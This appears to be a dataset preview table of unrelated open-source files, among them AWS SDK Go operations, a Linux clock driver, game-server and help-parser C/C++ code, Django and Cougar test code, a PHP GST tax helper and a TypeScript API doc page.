text
stringlengths 608
8.17k
|
---|
// Code generated by smithy-go-codegen DO NOT EDIT.
package finspace
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Adds metadata tags to a FinSpace resource.
func (c *Client) TagResource(ctx context.Context, params *TagResourceInput, optFns ...func(*Options)) (*TagResourceOutput, error) {
if params == nil {
params = &TagResourceInput{}
}
result, metadata, err := c.invokeOperation(ctx, "TagResource", params, optFns, addOperationTagResourceMiddlewares)
if err != nil {
return nil, err
}
out := result.(*TagResourceOutput)
out.ResultMetadata = metadata
return out, nil
}
type TagResourceInput struct {
// The Amazon Resource Name (ARN) for the resource.
//
// This member is required.
ResourceArn *string
// One or more tags to be assigned to the resource.
//
// This member is required.
Tags map[string]string
}
type TagResourceOutput struct {
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
}
func addOperationTagResourceMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsRestjson1_serializeOpTagResource{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsRestjson1_deserializeOpTagResource{}, middleware.After)
if err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack); err != nil {
return err
}
if err = addRestJsonContentTypeCustomization(stack); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addOpTagResourceValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opTagResource(options.Region), middleware.Before); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opTagResource(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "finspace",
OperationName: "TagResource",
}
}
|
/*
* Hisilicon clock separated gate driver
*
* Copyright (c) 2012-2013 Hisilicon Limited.
* Copyright (c) 2012-2013 Linaro Limited.
*
* Author: Haojian Zhuang <[email protected]>
* Xin Li <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
*/
#include <linux/kernel.h>
#include <linux/clk-provider.h>
#include <linux/io.h>
#include <linux/slab.h>
#include "clk.h"
/* clock separated gate register offset */
#define CLKGATE_SEPERATED_ENABLE 0x0
#define CLKGATE_SEPERATED_DISABLE 0x4
#define CLKGATE_SEPERATED_STATUS 0x8
struct clkgate_separated {
struct clk_hw hw;
void __iomem *enable; /* enable register */
u8 bit_idx; /* bits in enable/disable register */
u8 flags;
spinlock_t *lock;
};
static int clkgate_separated_enable(struct clk_hw *hw)
{
struct clkgate_separated *sclk;
unsigned long flags = 0;
u32 reg;
sclk = container_of(hw, struct clkgate_separated, hw);
if (sclk->lock)
spin_lock_irqsave(sclk->lock, flags);
reg = BIT(sclk->bit_idx);
writel_relaxed(reg, sclk->enable);
readl_relaxed(sclk->enable + CLKGATE_SEPERATED_STATUS);
if (sclk->lock)
spin_unlock_irqrestore(sclk->lock, flags);
return 0;
}
static void clkgate_separated_disable(struct clk_hw *hw)
{
struct clkgate_separated *sclk;
unsigned long flags = 0;
u32 reg;
sclk = container_of(hw, struct clkgate_separated, hw);
if (sclk->lock)
spin_lock_irqsave(sclk->lock, flags);
reg = BIT(sclk->bit_idx);
writel_relaxed(reg, sclk->enable + CLKGATE_SEPERATED_DISABLE);
readl_relaxed(sclk->enable + CLKGATE_SEPERATED_STATUS);
if (sclk->lock)
spin_unlock_irqrestore(sclk->lock, flags);
}
static int clkgate_separated_is_enabled(struct clk_hw *hw)
{
struct clkgate_separated *sclk;
u32 reg;
sclk = container_of(hw, struct clkgate_separated, hw);
reg = readl_relaxed(sclk->enable + CLKGATE_SEPERATED_STATUS);
reg &= BIT(sclk->bit_idx);
return reg ? 1 : 0;
}
static struct clk_ops clkgate_separated_ops = {
.enable = clkgate_separated_enable,
.disable = clkgate_separated_disable,
.is_enabled = clkgate_separated_is_enabled,
};
struct clk *hisi_register_clkgate_sep(struct device *dev, const char *name,
const char *parent_name,
unsigned long flags,
void __iomem *reg, u8 bit_idx,
u8 clk_gate_flags, spinlock_t *lock)
{
struct clkgate_separated *sclk;
struct clk *clk;
struct clk_init_data init;
sclk = kzalloc(sizeof(*sclk), GFP_KERNEL);
if (!sclk) {
pr_err("%s: fail to allocate separated gated clk\n", __func__);
return ERR_PTR(-ENOMEM);
}
init.name = name;
init.ops = &clkgate_separated_ops;
init.flags = flags | CLK_IS_BASIC;
init.parent_names = (parent_name ? &parent_name : NULL);
init.num_parents = (parent_name ? 1 : 0);
sclk->enable = reg + CLKGATE_SEPERATED_ENABLE;
sclk->bit_idx = bit_idx;
sclk->flags = clk_gate_flags;
sclk->hw.init = &init;
sclk->lock = lock;
clk = clk_register(dev, &sclk->hw);
if (IS_ERR(clk))
kfree(sclk);
return clk;
}
|
/**
* The Forgotten Server - a free and open-source MMORPG server emulator
* Copyright (C) 2015 Mark Samman <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include "otpch.h"
#include "housetile.h"
#include "house.h"
#include "game.h"
extern Game g_game;
HouseTile::HouseTile(int32_t x, int32_t y, int32_t z, House* _house) :
DynamicTile(x, y, z)
{
house = _house;
setFlag(TILESTATE_HOUSE);
}
void HouseTile::addThing(int32_t index, Thing* thing)
{
Tile::addThing(index, thing);
if (!thing->getParent()) {
return;
}
if (Item* item = thing->getItem()) {
updateHouse(item);
}
}
void HouseTile::internalAddThing(uint32_t index, Thing* thing)
{
Tile::internalAddThing(index, thing);
if (!thing->getParent()) {
return;
}
if (Item* item = thing->getItem()) {
updateHouse(item);
}
}
void HouseTile::updateHouse(Item* item)
{
if (item->getParent() != this) {
return;
}
Door* door = item->getDoor();
if (door) {
if (door->getDoorId() != 0) {
house->addDoor(door);
}
} else {
BedItem* bed = item->getBed();
if (bed) {
house->addBed(bed);
}
}
}
ReturnValue HouseTile::queryAdd(int32_t index, const Thing& thing, uint32_t count, uint32_t flags, Creature* actor/* = nullptr*/) const
{
if (const Creature* creature = thing.getCreature()) {
if (const Player* player = creature->getPlayer()) {
if (!house->isInvited(player)) {
return RETURNVALUE_PLAYERISNOTINVITED;
}
} else {
return RETURNVALUE_NOTPOSSIBLE;
}
} else if (thing.getItem() && actor) {
Player* actorPlayer = actor->getPlayer();
if (!house->isInvited(actorPlayer)) {
return RETURNVALUE_CANNOTTHROW;
}
}
return Tile::queryAdd(index, thing, count, flags, actor);
}
Tile* HouseTile::queryDestination(int32_t& index, const Thing& thing, Item** destItem, uint32_t& flags)
{
if (const Creature* creature = thing.getCreature()) {
if (const Player* player = creature->getPlayer()) {
if (!house->isInvited(player)) {
const Position& entryPos = house->getEntryPosition();
Tile* destTile = g_game.map.getTile(entryPos);
if (!destTile) {
std::cout << "Error: [HouseTile::queryDestination] House entry not correct"
<< " - Name: " << house->getName()
<< " - House id: " << house->getId()
<< " - Tile not found: " << entryPos << std::endl;
destTile = g_game.map.getTile(player->getTemplePosition());
if (!destTile) {
destTile = &(Tile::nullptr_tile);
}
}
index = -1;
*destItem = nullptr;
return destTile;
}
}
}
return Tile::queryDestination(index, thing, destItem, flags);
}
|
/*
Helpparse.c - help file parser.
Copyright (C) 2000 Imre Leber
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
If you have any questions, comments, suggestions, or fixes please
email me at: [email protected]
*/
#include <stdlib.h>
#include <string.h>
#include "hlpread.h"
static size_t AmofLines;
static char* EmptyString = "";
static char** HelpSysData = NULL;
static size_t CountLines(char* RawData, size_t bufsize)
{
size_t count = 0, i = 0;
while (i < bufsize)
{
if (RawData[i] == '\r')
{
count++;
if ((i+1 < bufsize) && (RawData[i+1] == '\n')) i++;
}
else if (RawData[i] == '\n')
count++;
i++;
}
return count + 1;
}
static char* GetNextLine(char* input, char** slot, int restinbuf)
{
char* p = input;
int len;
while ((*p != '\r') && (*p != '\n') && restinbuf)
{
p++;
restinbuf--;
}
len = (int)(p - input);
if (len)
{
if ((*slot = (char*) malloc(len+1)) == NULL)
return NULL;
memcpy(*slot, input, (int)(p-input));
*((*slot) + len) = '\0';
}
else
*slot = EmptyString;
if (*(p+1) == '\n')
return p+2;
else
return p+1;
}
int ParseHelpFile(char* RawData, size_t bufsize)
{
int i, j;
char* input = RawData;
AmofLines = CountLines(RawData, bufsize);
if ((HelpSysData = (char**) malloc(AmofLines * sizeof(char*))) == NULL)
return HELPMEMINSUFFICIENT;
for (i = 0; i < AmofLines; i++)
{
input = GetNextLine(input, &HelpSysData[i], (int)(bufsize - (input - RawData)));
if (!input)
{
for (j = 0; j < i; j++)
free(HelpSysData[j]);
free(HelpSysData);
HelpSysData=0;
return HELPMEMINSUFFICIENT;
}
}
return HELPSUCCESS;
}
size_t GetHelpLineCount()
{
return AmofLines;
}
char* GetHelpLine(int line)
{
return HelpSysData[line];
}
void FreeHelpSysData()
{
int i;
if (HelpSysData)
{
for (i = 0; i < AmofLines; i++)
{
if (HelpSysData[i] != EmptyString)
free(HelpSysData[i]);
}
free(HelpSysData);
}
HelpSysData = NULL;
}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
__author__ = 'Tim Schneider <[email protected]>'
__copyright__ = "Copyright 2015, Northbridge Development Konrad & Schneider GbR"
__credits__ = ["Tim Schneider", ]
__maintainer__ = "Tim Schneider"
__email__ = "[email protected]"
__status__ = "Development"
logger = logging.getLogger(__name__)
import glob
import os
import sys
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
print BASE_DIR
sys.path.insert(0, os.path.abspath(BASE_DIR))
try:
import coverage # Import coverage if available
cov = coverage.coverage(
cover_pylib=False,
config_file=os.path.join(os.path.dirname(__file__), 'coverage.conf'),
include='%s/*' % BASE_DIR,
)
cov.start()
sys.stdout.write('Using coverage\n')
except ImportError:
cov = None
sys.stdout.write('Coverage not available. To evaluate the coverage, please install coverage.\n')
import django
from django.conf import settings
from django.core.management import execute_from_command_line
# Unfortunately, apps can not be installed via ``modify_settings``
# decorator, because it would miss the database setup.
INSTALLED_APPS = (
'django_splitdate',
)
settings.configure(
SECRET_KEY="django_tests_secret_key",
DEBUG=False,
TEMPLATE_DEBUG=False,
ALLOWED_HOSTS=[],
INSTALLED_APPS=INSTALLED_APPS,
MIDDLEWARE_CLASSES=[],
ROOT_URLCONF='tests.urls',
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
LANGUAGE_CODE='en-us',
TIME_ZONE='UTC',
USE_I18N=True,
USE_L10N=True,
USE_TZ=True,
STATIC_URL='/static/',
# Use a fast hasher to speed up tests.
PASSWORD_HASHERS=(
'django.contrib.auth.hashers.MD5PasswordHasher',
),
FIXTURE_DIRS=glob.glob(BASE_DIR + '/' + '*/fixtures/')
)
django.setup()
args = [sys.argv[0], 'test']
# Current module (``tests``) and its submodules.
test_cases = '.'
# Allow accessing test options from the command line.
offset = 1
try:
sys.argv[1]
except IndexError:
pass
else:
option = sys.argv[1].startswith('-')
if not option:
test_cases = sys.argv[1]
offset = 2
args.append(test_cases)
# ``verbosity`` can be overwritten from command line.
#args.append('--verbosity=2')
args.extend(sys.argv[offset:])
execute_from_command_line(args)
if cov is not None:
sys.stdout.write('Evaluating Coverage\n')
cov.stop()
cov.save()
sys.stdout.write('Generating HTML Report\n')
cov.html_report() |
/*
* Copyright 2013, The Sporting Exchange Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Originally from UpdatedComponentTests/StandardValidation/REST/Rest_IDL_QueryParam_ENUM_blank.xls;
package com.betfair.cougar.tests.updatedcomponenttests.standardvalidation.rest;
import com.betfair.testing.utils.cougar.misc.XMLHelpers;
import com.betfair.testing.utils.cougar.assertions.AssertionUtils;
import com.betfair.testing.utils.cougar.beans.HttpCallBean;
import com.betfair.testing.utils.cougar.beans.HttpResponseBean;
import com.betfair.testing.utils.cougar.enums.CougarMessageProtocolRequestTypeEnum;
import com.betfair.testing.utils.cougar.manager.AccessLogRequirement;
import com.betfair.testing.utils.cougar.manager.CougarManager;
import org.testng.annotations.Test;
import org.w3c.dom.Document;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;
import java.sql.Timestamp;
import java.util.HashMap;
import java.util.Map;
/**
* Ensure that Cougar returns the correct fault, when a REST request passes a blank ENUM Query parameter
*/
public class RestIDLQueryParamENUMblankTest {
@Test
public void doTest() throws Exception {
// Create the HttpCallBean
CougarManager cougarManager1 = CougarManager.getInstance();
HttpCallBean httpCallBeanBaseline = cougarManager1.getNewHttpCallBean();
CougarManager cougarManagerBaseline = cougarManager1;
// Get the cougar logging attribute for getting log entries later
// Point the created HttpCallBean at the correct service
httpCallBeanBaseline.setServiceName("baseline", "cougarBaseline");
httpCallBeanBaseline.setVersion("v2");
// Set up the Http Call Bean to make the request
CougarManager cougarManager2 = CougarManager.getInstance();
HttpCallBean getNewHttpCallBean2 = cougarManager2.getNewHttpCallBean("87.248.113.14");
cougarManager2 = cougarManager2;
cougarManager2.setCougarFaultControllerJMXMBeanAttrbiute("DetailedFaults", "false");
getNewHttpCallBean2.setOperationName("enumOperation");
getNewHttpCallBean2.setServiceName("baseline", "cougarBaseline");
getNewHttpCallBean2.setVersion("v2");
// Set the parameters, setting the ENUM Query parameter as blank
Map map3 = new HashMap();
map3.put("headerParam","FooHeader");
getNewHttpCallBean2.setHeaderParams(map3);
Map map4 = new HashMap();
map4.put("queryParam","");
getNewHttpCallBean2.setQueryParams(map4);
getNewHttpCallBean2.setRestPostQueryObjects(DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new ByteArrayInputStream("<message><bodyParameter>FooBody</bodyParameter></message>".getBytes())));
// Get current time for getting log entries later
Timestamp getTimeAsTimeStamp11 = new Timestamp(System.currentTimeMillis());
// Make the 4 REST calls to the operation
cougarManager2.makeRestCougarHTTPCalls(getNewHttpCallBean2);
// Create the expected response as an XML document (Fault)
XMLHelpers xMLHelpers6 = new XMLHelpers();
Document createAsDocumentXml = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
Document createAsDocumentJson = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
// Convert the expected response to REST types for comparison with actual responses
Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesXml = cougarManager2.convertResponseToRestTypes(createAsDocumentXml, getNewHttpCallBean2);
Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesJson = cougarManager2.convertResponseToRestTypes(createAsDocumentJson, getNewHttpCallBean2);
// Check the 4 responses are as expected (Bad Request)
HttpResponseBean response7 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLXML);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response7.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response7.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response7.getHttpStatusText());
HttpResponseBean response8 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONJSON);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response8.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response8.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response8.getHttpStatusText());
HttpResponseBean response9 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLJSON);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response9.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response9.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response9.getHttpStatusText());
HttpResponseBean response10 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONXML);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response10.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response10.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response10.getHttpStatusText());
// generalHelpers.pauseTest(500L);
// Check the log entries are as expected
CougarManager cougarManager13 = CougarManager.getInstance();
cougarManager13.verifyAccessLogEntriesAfterDate(getTimeAsTimeStamp11, new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest") );
}
}
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package managedblockchain
import (
"context"
"fmt"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/managedblockchain/types"
smithy "github.com/awslabs/smithy-go"
"github.com/awslabs/smithy-go/middleware"
smithyhttp "github.com/awslabs/smithy-go/transport/http"
)
// Creates a proposal for a change to the network that other members of the network
// can vote on, for example, a proposal to add a new member to the network. Any
// member can create a proposal.
func (c *Client) CreateProposal(ctx context.Context, params *CreateProposalInput, optFns ...func(*Options)) (*CreateProposalOutput, error) {
stack := middleware.NewStack("CreateProposal", smithyhttp.NewStackRequest)
options := c.options.Copy()
for _, fn := range optFns {
fn(&options)
}
addawsRestjson1_serdeOpCreateProposalMiddlewares(stack)
awsmiddleware.AddRequestInvocationIDMiddleware(stack)
smithyhttp.AddContentLengthMiddleware(stack)
addResolveEndpointMiddleware(stack, options)
v4.AddComputePayloadSHA256Middleware(stack)
addRetryMiddlewares(stack, options)
addHTTPSignerV4Middleware(stack, options)
awsmiddleware.AddAttemptClockSkewMiddleware(stack)
addClientUserAgent(stack)
smithyhttp.AddErrorCloseResponseBodyMiddleware(stack)
smithyhttp.AddCloseResponseBodyMiddleware(stack)
addIdempotencyToken_opCreateProposalMiddleware(stack, options)
addOpCreateProposalValidationMiddleware(stack)
stack.Initialize.Add(newServiceMetadataMiddleware_opCreateProposal(options.Region), middleware.Before)
addRequestIDRetrieverMiddleware(stack)
addResponseErrorMiddleware(stack)
for _, fn := range options.APIOptions {
if err := fn(stack); err != nil {
return nil, err
}
}
handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack)
result, metadata, err := handler.Handle(ctx, params)
if err != nil {
return nil, &smithy.OperationError{
ServiceID: ServiceID,
OperationName: "CreateProposal",
Err: err,
}
}
out := result.(*CreateProposalOutput)
out.ResultMetadata = metadata
return out, nil
}
type CreateProposalInput struct {
// The type of actions proposed, such as inviting a member or removing a member.
// The types of Actions in a proposal are mutually exclusive. For example, a
// proposal with Invitations actions cannot also contain Removals actions.
//
// This member is required.
Actions *types.ProposalActions
// A unique, case-sensitive identifier that you provide to ensure the idempotency
// of the operation. An idempotent operation completes no more than one time. This
// identifier is required only if you make a service request directly using an HTTP
// client. It is generated automatically if you use an AWS SDK or the AWS CLI.
//
// This member is required.
ClientRequestToken *string
// The unique identifier of the member that is creating the proposal. This
// identifier is especially useful for identifying the member making the proposal
// when multiple members exist in a single AWS account.
//
// This member is required.
MemberId *string
// The unique identifier of the network for which the proposal is made.
//
// This member is required.
NetworkId *string
// A description for the proposal that is visible to voting members, for example,
// "Proposal to add Example Corp. as member."
Description *string
}
type CreateProposalOutput struct {
// The unique identifier of the proposal.
ProposalId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
}
func addawsRestjson1_serdeOpCreateProposalMiddlewares(stack *middleware.Stack) {
stack.Serialize.Add(&awsRestjson1_serializeOpCreateProposal{}, middleware.After)
stack.Deserialize.Add(&awsRestjson1_deserializeOpCreateProposal{}, middleware.After)
}
type idempotencyToken_initializeOpCreateProposal struct {
tokenProvider IdempotencyTokenProvider
}
func (*idempotencyToken_initializeOpCreateProposal) ID() string {
return "OperationIdempotencyTokenAutoFill"
}
func (m *idempotencyToken_initializeOpCreateProposal) HandleInitialize(ctx context.Context, in middleware.InitializeInput, next middleware.InitializeHandler) (
out middleware.InitializeOutput, metadata middleware.Metadata, err error,
) {
if m.tokenProvider == nil {
return next.HandleInitialize(ctx, in)
}
input, ok := in.Parameters.(*CreateProposalInput)
if !ok {
return out, metadata, fmt.Errorf("expected middleware input to be of type *CreateProposalInput ")
}
if input.ClientRequestToken == nil {
t, err := m.tokenProvider.GetIdempotencyToken()
if err != nil {
return out, metadata, err
}
input.ClientRequestToken = &t
}
return next.HandleInitialize(ctx, in)
}
func addIdempotencyToken_opCreateProposalMiddleware(stack *middleware.Stack, cfg Options) {
stack.Initialize.Add(&idempotencyToken_initializeOpCreateProposal{tokenProvider: cfg.IdempotencyTokenProvider}, middleware.Before)
}
func newServiceMetadataMiddleware_opCreateProposal(region string) awsmiddleware.RegisterServiceMetadata {
return awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "managedblockchain",
OperationName: "CreateProposal",
}
}
|
<?php defined('BASEPATH') or exit('No direct script access allowed');
/*
* ==============================================================================
* Author : Sheik
* Email : [email protected]
* For : SRAM POS
* Web : http://srammram.com
* ==============================================================================
*/
class Gst
{
public function __construct() {
}
public function __get($var) {
return get_instance()->$var;
}
function summary($rows = [], $return_rows = [], $product_tax = 0, $onCost = false) {
$code = '';
if ($this->Settings->invoice_view > 0 && !empty($rows)) {
$tax_summary = $this->taxSummary($rows, $onCost);
if (!empty($return_rows)) {
$return_tax_summary = $this->taxSummary($return_rows, $onCost);
$tax_summary = $tax_summary + $return_tax_summary;
}
$code = $this->genHTML($tax_summary, $product_tax);
}
return $code;
}
function taxSummary($rows = [], $onCost = false) {
$tax_summary = [];
if (!empty($rows)) {
foreach ($rows as $row) {
if (isset($tax_summary[$row->tax_code])) {
$tax_summary[$row->tax_code]['items'] += $row->unit_quantity;
$tax_summary[$row->tax_code]['tax'] += $row->item_tax;
$tax_summary[$row->tax_code]['amt'] += ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
} else {
$tax_summary[$row->tax_code]['items'] = $row->unit_quantity;
$tax_summary[$row->tax_code]['tax'] = $row->item_tax;
$tax_summary[$row->tax_code]['amt'] = ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
$tax_summary[$row->tax_code]['name'] = $row->tax_name;
$tax_summary[$row->tax_code]['code'] = $row->tax_code;
$tax_summary[$row->tax_code]['rate'] = $row->tax_rate;
}
}
}
return $tax_summary;
}
function genHTML($tax_summary = [], $product_tax = 0) {
$html = '';
if (!empty($tax_summary)) {
$html .= '<h4 style="font-weight:bold;">' . lang('tax_summary') . '</h4>';
$html .= '<table class="table table-bordered table-striped print-table order-table table-condensed"><thead><tr><th>' . lang('name') . '</th><th>' . lang('code') . '</th><th>' . lang('qty') . '</th><th>' . lang('tax_excl') . '</th><th>' . lang('tax_amt') . '</th></tr></td><tbody>';
foreach ($tax_summary as $summary) {
$html .= '<tr><td>' . $summary['name'] . '</td><td class="text-center">' . $summary['code'] . '</td><td class="text-center">' . $this->sma->formatQuantity($summary['items']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['amt']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['tax']) . '</td></tr>';
}
$html .= '</tbody></tfoot>';
$html .= '<tr class="active"><th colspan="4" class="text-right">' . lang('total_tax_amount') . '</th><th class="text-right">' . $this->sma->formatMoney($product_tax) . '</th></tr>';
$html .= '</tfoot></table>';
}
return $html;
}
function calculteIndianGST($item_tax, $state, $tax_details) {
if ($this->Settings->indian_gst) {
$cgst = $sgst = $igst = 0;
if ($state) {
$gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate/2), 0).'%' : $this->sma->formatDecimal(($tax_details->rate/2), 0);
$cgst = $this->sma->formatDecimal(($item_tax / 2), 4);
$sgst = $this->sma->formatDecimal(($item_tax / 2), 4);
} else {
$gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate), 0).'%' : $this->sma->formatDecimal(($tax_details->rate), 0);
$igst = $item_tax;
}
return ['gst' => $gst, 'cgst' => $cgst, 'sgst' => $sgst, 'igst' => $igst];
}
return [];
}
function getIndianStates($blank = false) {
$istates = [
'AN' => 'Andaman & Nicobar',
'AP' => 'Andhra Pradesh',
'AR' => 'Arunachal Pradesh',
'AS' => 'Assam',
'BR' => 'Bihar',
'CH' => 'Chandigarh',
'CT' => 'Chhattisgarh',
'DN' => 'Dadra and Nagar Haveli',
'DD' => 'Daman & Diu',
'DL' => 'Delhi',
'GA' => 'Goa',
'GJ' => 'Gujarat',
'HR' => 'Haryana',
'HP' => 'Himachal Pradesh',
'JK' => 'Jammu & Kashmir',
'JH' => 'Jharkhand',
'KA' => 'Karnataka',
'KL' => 'Kerala',
'LD' => 'Lakshadweep',
'MP' => 'Madhya Pradesh',
'MH' => 'Maharashtra',
'MN' => 'Manipur',
'ML' => 'Meghalaya',
'MZ' => 'Mizoram',
'NL' => 'Nagaland',
'OR' => 'Odisha',
'PY' => 'Puducherry',
'PB' => 'Punjab',
'RJ' => 'Rajasthan',
'SK' => 'Sikkim',
'TN' => 'Tamil Nadu',
'TR' => 'Tripura',
'UK' => 'Uttarakhand',
'UP' => 'Uttar Pradesh',
'WB' => 'West Bengal',
];
if ($blank) {
array_unshift($istates, lang('select'));
}
return $istates;
}
}
|
[stime](../README.md) › [Globals](../globals.md) › ["Format/Minute"](../modules/_format_minute_.md) › [Minute](_format_minute_.minute.md)
# Class: Minute
Minute format
## Hierarchy
* [Format](_format_.format.md)
↳ **Minute**
## Index
### Methods
* [format](_format_minute_.minute.md#format)
* [formatNumber](_format_minute_.minute.md#protected-formatnumber)
* [parse](_format_minute_.minute.md#parse)
* [parsePaddedAndUnpaddedUnits](_format_minute_.minute.md#protected-parsepaddedandunpaddedunits)
## Methods
### format
▸ **format**(`time`: [Formattable](_formattable_.formattable.md), `format`: string): *string*
*Overrides [Format](_format_.format.md).[format](_format_.format.md#abstract-format)*
*Defined in [Format/Minute.ts:11](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L11)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`time` | [Formattable](_formattable_.formattable.md) |
`format` | string |
**Returns:** *string*
___
### `Protected` formatNumber
▸ **formatNumber**(`number`: number, `leadingZero`: boolean): *string*
*Inherited from [Year](_format_year_.year.md).[formatNumber](_format_year_.year.md#protected-formatnumber)*
*Defined in [Format.ts:27](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L27)*
